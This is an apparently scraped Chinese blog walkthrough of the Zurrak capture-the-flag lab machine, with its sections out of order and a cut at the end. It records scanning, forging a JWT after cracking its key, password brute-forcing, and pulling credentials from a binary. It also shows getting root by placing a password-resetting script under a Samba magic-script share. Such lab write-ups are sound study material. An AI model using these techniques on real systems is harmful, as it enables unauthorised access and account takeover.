definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n(remote) postgres@zurrak:\/home\/postgres$ cat crontab -l\ncat: invalid option -- 'l'\nTry 'cat --help' for more information.\n(remote) postgres@zurrak:\/home\/postgres$ crontab -l\nno crontab for postgres\n(remote) postgres@zurrak:\/home\/postgres$ cd \/tmp\n(remote) postgres@zurrak:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/zurrak\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[05:30:36] uploaded 860.55KiB in 0.84 seconds upload.py:76\n(local) pwncat$ \n(remote) postgres@zurrak:\/tmp$ chmod +x linpeas.sh \n(remote) postgres@zurrak:\/tmp$ .\/linpeas.sh <\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u4f7f\u7528emergency.sh<\/code>\u7684\u5730\u65b9\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n(remote) postgres@zurrak:\/$ su emre\nPassword: \nsu: Authentication failure\n(remote) postgres@zurrak:\/$ vim \/etc\/samba\/smb.conf \nbash: vim: command not found\n(remote) postgres@zurrak:\/$ cat \/etc\/samba\/smb.conf \n......\n[ipc$]\nhosts allow = 127.0.0.1\nhosts deny = 0.0.0.0\/0\nguest ok = no\nbrowseable = no\n\n[share]\ncomment = "zurrak operations share"\npath = \/opt\/smbshare\nhosts allow = 0.0.0.0\/0\nguest ok = no\nbrowseable = yes\nwritable = no\nvalid users = emre, asli\n\n[internal]\ncomment = "zurrak internal share"\npath = \/opt\/internal\nhosts allow = 127.0.0.1\nguest ok = no\nbrowseable = yes\nwritable = yes\nvalid users = emre\ncreate mask = 0777\ndirectory mask = 0777\nforce user = root\nmagic script = emergency.sh<\/code><\/pre>\n\u53d1\u73b0\u4e00\u4e2a\u53ea\u53ef\u4ee5\u4ece\u5185\u90e8\u8fde\u63a5\u7684smb\u670d\u52a1\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
(remote) postgres@zurrak:\/$ smbclient \\\\\\\\127.0.0.1\\\\internal -U emre\nPassword for [ZURRAK.HMV\\emre]:\nsession setup failed: NT_STATUS_LOGON_FAILURE\n(remote) postgres@zurrak:\/$ cd \/opt\/internal\n(remote) postgres@zurrak:\/opt\/internal$ ls -la\ntotal 8\ndrwxr-xr-x 2 shareuser root 4096 Oct 20 19:02 .\ndrwxr-xr-x 4 root root 4096 Oct 20 16:36 ..\n(remote) postgres@zurrak:\/opt\/internal$ smbclient \/\/127.0.0.1\/internal -U 'emre'\nPassword for [ZURRAK.HMV\\emre]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Fri Oct 20 19:02:55 2023\n .. D 0 Fri Oct 20 16:36:51 2023\n\n 9232860 blocks of size 1024. 6040656 blocks available\nsmb: \\> pwd\nCurrent directory is \\\\127.0.0.1\\internal\\\nsmb: \\> cd \/home\/postgres\/\ncd \\home\\postgres\\: NT_STATUS_OBJECT_PATH_NOT_FOUND\nsmb: \\> lcd \/home\/postgres\nsmb: \\> ls\n . D 0 Fri Oct 20 19:02:55 2023\n .. D 0 Fri Oct 20 16:36:51 2023\n\n 9232860 blocks of size 1024. 6040656 blocks available\nsmb: \\> ^C\n(remote) postgres@zurrak:\/opt\/internal$ cd \/home\/postgres\/\n(remote) postgres@zurrak:\/home\/postgres$ ls -la\ntotal 20\ndrwxr-xr-x 3 postgres postgres 4096 Apr 7 05:31 .\ndrwxr-xr-x 3 root root 4096 Oct 20 19:06 ..\n-rw------- 1 postgres postgres 28 Oct 24 16:47 emergency.sh\ndrwx------ 3 postgres postgres 4096 Apr 7 05:31 .gnupg\n-rw-r--r-- 1 postgres postgres 33 Oct 20 20:23 user.txt\n(remote) postgres@zurrak:\/home\/postgres$ cat emergency.sh \necho "root:1234" | chpasswd\n(remote) postgres@zurrak:\/home\/postgres$ smbclient \/\/127.0.0.1\/internal -U 'emre'\nPassword for [ZURRAK.HMV\\emre]:\nTry "help" to get a list of possible commands.\nsmb: \\> pwd\nCurrent directory is \\\\127.0.0.1\\internal\\\nsmb: \\> lcd \/home\/postgres\/\nsmb: \\> lpwd\nlpwd: command not found\nsmb: \\> pwd\nCurrent directory is \\\\127.0.0.1\\internal\\\nsmb: \\> put emergency.sh\nputting file emergency.sh as \\emergency.sh (0.4 kb\/s) (average 0.4 kb\/s)\nsmb: \\> ^C<\/code><\/pre>\n\u7b49\u5f85\u6267\u884c\uff0c\u7136\u540e\u5207\u6362\u7528\u6237\uff1a<\/p>\n
(remote) postgres@zurrak:\/home\/postgres$ su root\nPassword: # 1234\nroot@zurrak:\/home\/postgres# cd \/root\nroot@zurrak:~# ls -la\ntotal 24\ndrwx------ 4 root root 4096 Nov 14 04:12 .\ndrwxr-xr-x 18 root root 4096 Oct 20 15:22 ..\n-rw------- 1 root root 0 Nov 14 04:12 .bash_history\nlrwxrwxrwx 1 root root 9 Nov 14 04:12 bash_history -> \/dev\/null\n-rw------- 1 root root 20 Oct 24 13:56 .lesshst\ndrwxr-xr-x 3 root root 4096 Nov 14 04:59 .local\n-rw-r--r-- 1 root root 33 Oct 20 20:23 root.txt\ndrwx------ 2 root root 4096 Oct 20 15:21 .ssh\nroot@zurrak:~# cat root.txt \n66fce7650a88ac2afd99d061e1c6a4df<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\n\u7206\u7834smb\u5bc6\u7801<\/h3>\n
\u5728\u770b\u7eff\u5e08\u5085\u7684wp<\/a>\u7684\u65f6\u5019\u53d1\u73b0\u4e86\u4e00\u79cd\u7206\u7834\u767b\u5f55\u7684\u65b9\u5f0f\uff1a<\/p>\ncrackmapexec smb 172.20.10.3 -u asli -p \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<\/div><\/p>\n\u725b\u86d9\uff01\uff01\uff01\uff01\u8bb0\u4f4f\u4e86\uff01<\/p>\n
\u4f7f\u7528qemu\u6a21\u62df<\/h3>\n
\u770b\u4e00\u56fd\u5916\u5e08\u5085\u89e3\u6790<\/a>\u7684\u65f6\u5019\uff0c\u51fa\u73b0\u4e86\u4f7f\u7528qemu<\/code>\u6a21\u62df\u6267\u884c\uff0c\u800c\u4e0d\u7528vmware\u8fdb\u884c\u64cd\u4f5c\u7684\u65b9\u6cd5\uff0c\u5728\u8fd9\u91cc\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\nqemu-system-x86_64 -hda zurrak.old.vmdk -display gtk,show-cursor=on\n# cat (hd0,1)\/etc\/shadow\nunshadow passwd shadow > hashattack<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/kerszl.github.io\/hacking\/walkthrough\/Zurrak\/<\/a><\/p>\n
rustscan -a 172.20.10.3 -- -A <\/code><\/pre>\nOpen 172.20.10.3:80\nOpen 172.20.10.3:139\nOpen 172.20.10.3:445\nOpen 172.20.10.3:5432\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n| http-title: Login Page\n|_Requested resource was login.php\n|_http-server-header: Apache\/2.4.57 (Debian)\n139\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n5432\/tcp open postgresql syn-ack PostgreSQL DB 9.6.0 or later\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=zurrak\n| Subject Alternative Name: DNS:zurrak\n| Issuer: commonName=zurrak\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-10-20T19:29:16\n| Not valid after: 2033-10-17T19:29:16\n| MD5: 2c24:bdb8:b7d7:8fa8:51f0:1be2:2625:3a9d\n| SHA-1: 086e:bf83:1204:d0ef:0230:4290:8a92:b641:d3f4:ceaf\n| -----BEGIN CERTIFICATE-----\n| MIIC7zCCAdegAwIBAgIUTdKMVheATMcefGITp05Zwlj8vsgwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGenVycmFrMB4XDTIzMTAyMDE5MjkxNloXDTMzMTAxNzE5\n| MjkxNlowETEPMA0GA1UEAwwGenVycmFrMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEA1mhNG6o60cGsrq4iA6Tw2S6IDWRmx6PBz7V8e137c29wNuxu\/NSe\n| Xr8LWR6lbjI1SJFnn380kI+QoXpUx2dGc7coHJF+ZXZ8spl0mvPvGPRlc3SaCk5c\n| 3O88NOgIfA5rEwHdSdYdzBsmxaifhjibW+CPm9OMKmrhhaxeusfSF0Z2PPQiRF3r\n| zqrvYEhcjbGy2MJrQqVRiT17WHp0IxzErIsAaOICbEkWK5cyraG67WIT34SZc\/EG\n| VTbEGxm3uILog4pVePNP1wrObG1RAnvdePZLYqy4f+SGqSERo+9OmAmP3Wlpo43U\n| bZlwu1NCY81LV\/T5htm0as6Euqfa7rPfEQIDAQABoz8wPTAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBnp1cnJhazAdBgNVHQ4EFgQUWAXLgNI0sXpXQKbUVFqdGH5EfNAw\n| DQYJKoZIhvcNAQELBQADggEBAIAk\/vaV6QkjotcEIm7pT1gYZVdngBBoge9WYse9\n| suUMhoQvXjep6MoLG8wCPcNNw9GpCSQrzOuxfiovhk0WfLnRDJ9XdyL0GTt3lELh\n| kdIdeJUZh4MrhjyCrzASQlbQkfrMhiOOhIedtrfb1I9XSFZqFTjYRjsYRBFRc6Mc\n| oTkR3KurLUg8cqYLa5f7j9TLpgGIfNlUfvw7WyrSX0sIL2I5kMHwLP1ayWHVspXr\n| lq6PWoN6UVW4+NKNok7ty3CxOvVUabAlTiqkRRK3Hxr5e7y+oCIjfrYSQyl3JrRH\n| zHHGJB6H9nMbKafvqiBpdg8QL\/Fp2mvTalwfRKP8QEhRZeY=\n|_-----END CERTIFICATE-----\n| fingerprint-strings: \n| SMBProgNeg: \n| SFATAL\n| VFATAL\n| C0A000\n| Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0\n| Fpostmaster.c\n| L2195\n|_ RProcessStartupPacket\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port5432-TCP:V=7.94SVN%I=7%D=4\/7%Time=66123916%P=x86_64-pc-linux-gnu%r(\nSF:SMBProgNeg,8C,"E\\0\\0\\0\\x8bSFATAL\\0VFATAL\\0C0A000\\0Munsupported\\x20front\nSF:end\\x20protocol\\x2065363\\.19778:\\x20server\\x20supports\\x203\\.0\\x20to\\x2\nSF:03\\.0\\0Fpostmaster\\.c\\0L2195\\0RProcessStartupPacket\\0\\0");\n\nHost script results:\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2024-04-07T06:11:59\n|_ start_date: N\/A\n|_clock-skew: 18s\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 39463\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 52224\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 47754\/udp): CLEAN (Timeout)\n| Check 4 (port 54992\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n\/vendor (Status: 301) [Size: 311] [--> http:\/\/172.20.10.3\/vendor\/]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\ngobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/.php (Status: 403) [Size: 276]\n\/index.php (Status: 302) [Size: 1270] [--> login.php]\n\/login.php (Status: 200) [Size: 2041]\n\/admin.php (Status: 302) [Size: 2624] [--> login.php]\n\/vendor (Status: 301) [Size: 311] [--> http:\/\/172.20.10.3\/vendor\/]\n\/index_.php (Status: 200) [Size: 200]\n\/.php (Status: 403) [Size: 276]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.3<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.3\n+ Target Hostname: 172.20.10.3\n+ Target Port: 80\n+ Start Time: 2024-04-07 02:15:23 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ Root page \/ redirects to: login.php\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/login.php: Admin login page\/section found.\n+ \/composer.json: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/composer.lock: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host\n+ End Time: 2024-04-07 02:15:43 (GMT-4) (20 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n
\u5f00\u542f\u4e86\u4e00\u4e2asmb<\/code>\u670d\u52a1\u548c\u4e00\u4e2aPostgreSQL<\/code>\u6570\u636e\u5e93\uff1a<\/p>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
enum4linux 172.20.10.3<\/code><\/pre>\n<\/div><\/p>\n\u795e\u9b54\u60c5\u51b5\u3002\u3002\u3002\u3002\u6362\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
smbmap -H 172.20.10.3<\/code><\/pre>\n<\/div><\/p>\n\u770b\u6765\u6682\u65f6\u8d70\u4e0d\u901a\u8fd9\u6761\u8def\u4e86\u3002<\/p>\n
\u6e90\u7801\u5206\u6790<\/h3>\n
\u6253\u5f00\u6e90\u7801\u7684\u65f6\u5019\u770b\u5230\u7ed9\u51fa\u4e86\u8d26\u53f7\u5bc6\u7801\u4e86\uff1a<\/p>\n
<!-- username:internal@zurrak.htb && password:testsite --><\/code><\/pre>\n\u767b\u5f55\u4e00\u4e0b\uff0c\u7a7a\u767d\u9875\uff0c\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!-- <a class="navbar-brand" href="admin.php">Admin Panel<\/a>--><\/code><\/pre>\n\u8fd4\u56de\u770b\u4e00\u4e0b\u8fd9\u4e2aadmin.php<\/code>\uff0c\u6ca1\u6709\u53d1\u751f\u53d8\u5316\uff0c\u5565\u90fd\u6ca1\u6709\u3002\u3002<\/p>\n\u654f\u611f\u76ee\u5f55\u5206\u6790<\/h3>\n
\u67e5\u770b\u4e00\u4e0bindex_.php<\/code>\uff1a<\/p>\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vZXhhbXBsZS5vcmciLCJhdWQiOiJodHRwOi8vZXhhbXBsZS5jb20iLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gOEkQc3YCCIIjE-GxU0UTa9Lx6hQwwk5zYfO4pZQZt4<\/code><\/pre>\n\u5206\u6210\u4e09\u6bb5\uff0c\u770b\u4e0a\u53bb\u50cf\u662fjwt\uff0c\u4e22\u7f51\u7ad9<\/a>\u4e0a\u770b\u770b\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9.ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso<\/code><\/pre>\n\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u4f2a\u9020JWT<\/h3>\n
\u5b58\u5728isAdmin<\/code>\u5b57\u6bb5\uff0c\u4f2a\u9020\u4e00\u4e0b\u8bf7\u6c42\uff1a<\/p>\n<\/div><\/p>\n\u8fd8\u5dee\u4e00\u4e2a\u5bc6\u94a5\uff0c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9.ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso -C -d \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u4f2a\u9020\u4e00\u4e0b\u8bf7\u6c42\uff1a<\/p>\n
<\/div><\/p>\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u4e2atoken\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u56fe\u7247\u9690\u5199<\/h3>\n
\u4e2d\u95f4\u63d0\u793a\u5b58\u5728\u9690\u5199\u4e86\uff0c\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/172.20.10.3\/zurrakhorse.jpg\nhttp:\/\/172.20.10.3\/zurraksnake.jpg\nhttp:\/\/172.20.10.3\/zurrakhearts.jpg<\/code><\/pre>\n\u4e0b\u8f7d\u4e00\u4e0b\uff0c\u53d1\u73b0\u90fd\u85cf\u4e86\u4e1c\u897f\uff0c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u653e\u5230\u672c\u5730\u6765\uff0c\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n __int64 v4; \/\/ [rsp+20h] [rbp-60h]\n __int64 v5; \/\/ [rsp+28h] [rbp-58h]\n __int64 v6; \/\/ [rsp+30h] [rbp-50h]\n __int64 v7; \/\/ [rsp+38h] [rbp-48h]\n __int64 v8; \/\/ [rsp+40h] [rbp-40h]\n __int64 v9; \/\/ [rsp+48h] [rbp-38h]\n char v10; \/\/ [rsp+50h] [rbp-30h]\n\n _main(*(_QWORD *)&argc, argv, envp);\n LODWORD(v9) = 115;\n LODWORD(v8) = 116;\n LODWORD(v7) = 97;\n LODWORD(v6) = 99;\n LODWORD(v5) = 101;\n LODWORD(v4) = 118;\n c(&v10, 105i64, 108i64, 111i64, v4, v5, v6, v7, v8, v9);\n printf("classified\\n");\n return 0;\n}<\/code><\/pre>\n__int64 c(char *a1, unsigned int a2, ...)\n{\n __int64 result; \/\/ rax\n unsigned int *v3; \/\/ ST20_8\n unsigned int *v4; \/\/ rax\n va_list v5; \/\/ [rsp+20h] [rbp-10h]\n char i; \/\/ [rsp+2Fh] [rbp-1h]\n char *v7; \/\/ [rsp+40h] [rbp+10h]\n va_list va; \/\/ [rsp+50h] [rbp+20h]\n\n va_start(va, a2);\n v7 = a1;\n va_copy(v5, va);\n result = a2;\n for ( i = a2; i; i = result )\n {\n sprintf(v7, "%s%c", v7, (unsigned int)i, v5);\n v4 = v3;\n v5 = (va_list)(v3 + 2);\n result = *v4;\n }\n return result;\n}<\/code><\/pre>\n\u8fd9\u6bb5\u4ee3\u7801\u6211\u770b\u7684\u4e5f\u8ff7\u8ff7\u7cca\u7cca\uff0c\u4f46\u662f\u4e0a\u9762main\u51fd\u6570\u5b58\u50a8\u4e86\u4e00\u4e2a\u6570\u7ec4\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
105,108,111,118,110,99,97,116,115<\/code><\/pre>\n\u8f6c\u5316\u6210\u5b57\u7b26\u4e32\u4e3a\uff1a<\/p>\n
<\/div><\/p>\n\u6545\u5f97\u51fa\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n
asli\nilovncats<\/code><\/pre>\n\u5c1d\u8bd5ssh\u767b\u5f55\uff0c\u53d1\u73b0\u9519\u8bef\uff1a<\/p>\n
ssh asli@172.20.10.3\nssh: connect to host 172.20.10.3 port 22: Connection refused<\/code><\/pre>\n\u9519\u8bef\u5c1d\u8bd5smb\u8fde\u63a5\uff1a<\/p>\n
SMB\u8fde\u63a5<\/h3>\n
\u5148\u63a2\u6d4b\u4e00\u4e0b\uff1a<\/p>\n
smbmap -u asli -p ilovncats -H 172.20.10.3<\/code><\/pre>\n<\/div><\/p>\nwhat\uff1f<\/p>\n
smbclient \/\/172.20.10.3\/share -U asli --password ilovncats<\/code><\/pre>\n\u4e5f\u8fde\u4e0d\u4e0a\u53bb\uff0c\u96be\u9053\u662f\u5bc6\u7801\u641e\u9519\u4e86\uff1f<\/p>\n
\u62ffGhidra<\/code>\u770b\u770b\uff1a<\/p>\nint __cdecl main(int _Argc,char **_Argv,char **_Env)\n\n{\n undefined1 (*pauVar1) [10];\n undefined8 uVar2;\n undefined8 uVar3;\n FILE local_208 [10];\n\n __main();\n uVar3 = 0x6f;\n uVar2 = 0x6c;\n pauVar1 = (undefined1 (*) [10])0x69;\n c(local_208,'i',0x6c,0x6f,0x76,0x65,99,0x61,0x74,0x73);\n printf("classified\\n",pauVar1,uVar2,uVar3);\n return 0;\n}<\/code><\/pre>\n<\/div><\/p>\n\u554a\u3002\u3002\u3002\u3002\u3002<\/p>\n
smbclient \/\/172.20.10.3\/share -U asli --password ilovecats<\/code><\/pre>\n\u7136\u540e\u5728\u6f2b\u957f\u7684\u4fe1\u606f\u641c\u96c6\u8fc7\u7a0b\u4e2d\u627e\u5230\u4e86\u4e00\u4e2a\u786c\u76d8\u6587\u4ef6\u3002\u3002\u3002\u3002<\/p>\n
Try "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Fri Oct 20 17:14:00 2023\n .. D 0 Fri Oct 20 16:36:51 2023\n DONTDELETE D 0 Fri Oct 20 23:44:44 2023\n operations D 0 Sat Oct 21 00:04:30 2023\n backup.reg N 1792 Sun Jul 24 01:30:09 2011\n human_resources D 0 Sun Apr 2 01:30:09 2017\n launch_options.txt N 21 Tue Dec 13 22:55:16 2022\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\> cd operations\\\nsmb: \\operations\\> ls\n . D 0 Sat Oct 21 00:04:30 2023\n .. D 0 Fri Oct 20 17:14:00 2023\n binaries D 0 Tue Nov 14 04:08:42 2023\n operators.txt N 118 Tue Dec 18 01:30:09 2001\n New folder D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\> get operators.txt \ngetting file \\operations\\operators.txt of size 118 as operators.txt (3.2 KiloBytes\/sec) (average 3.2 KiloBytes\/sec)\nsmb: \\operations\\> cd New folder\\\ncd \\operations\\New\\: NT_STATUS_OBJECT_NAME_NOT_FOUND\nsmb: \\operations\\> ls\n . D 0 Sat Oct 21 00:04:30 2023\n .. D 0 Fri Oct 20 17:14:00 2023\n binaries D 0 Tue Nov 14 04:08:42 2023\n operators.txt N 118 Tue Dec 18 01:30:09 2001\n New folder D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\> cd 'New folder'\ncd \\operations\\'New\\: NT_STATUS_OBJECT_NAME_NOT_FOUND\nsmb: \\operations\\> cd "New folder"\nsmb: \\operations\\New folder\\> ls \n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Sat Oct 21 00:04:30 2023\n deploy D 0 Fri Oct 20 23:52:42 2023\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\> cd deploy\\\nsmb: \\operations\\New folder\\deploy\\> ls\n . D 0 Fri Oct 20 23:52:42 2023\n .. D 0 Tue Dec 18 01:30:09 2001\n 3 D 0 Tue Dec 18 01:30:09 2001\n 2 D 0 Tue Dec 18 01:30:09 2001\n 4 D 0 Tue Dec 18 01:30:09 2001\n 1 D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\> cd 1\nsmb: \\operations\\New folder\\deploy\\1\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n read.txt N 15 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Dec 18 01:30:09 2001\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\1\\> cd ..\/2\nsmb: \\operations\\New folder\\deploy\\2\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n read.txt N 15 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Dec 18 01:30:09 2001\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\2\\> cd ..\/3\nsmb: \\operations\\New folder\\deploy\\3\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n latest D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\> cd ..\/4\nsmb: \\operations\\New folder\\deploy\\4\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n read.txt N 15 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Dec 18 01:30:09 2001\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\4\\> cd ..\/3\nsmb: \\operations\\New folder\\deploy\\3\\> cd latest\\\nsmb: \\operations\\New folder\\deploy\\3\\latest\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Oct 24 16:21:21 2023\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\latest\\> cd approved\\\nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> ls\n . D 0 Tue Oct 24 16:21:21 2023\n .. D 0 Tue Dec 18 01:30:09 2001\n zurrak.old.vmdk N 713883648 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> \nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> get zurrak.old.vmdk \ngetting file \\operations\\New folder\\deploy\\3\\latest\\approved\\zurrak.old.vmdk of size 713883648 as zurrak.old.vmdk (34234.5 KiloBytes\/sec) (average 34174.1 KiloBytes\/sec)\nsmb: \\operations\\New 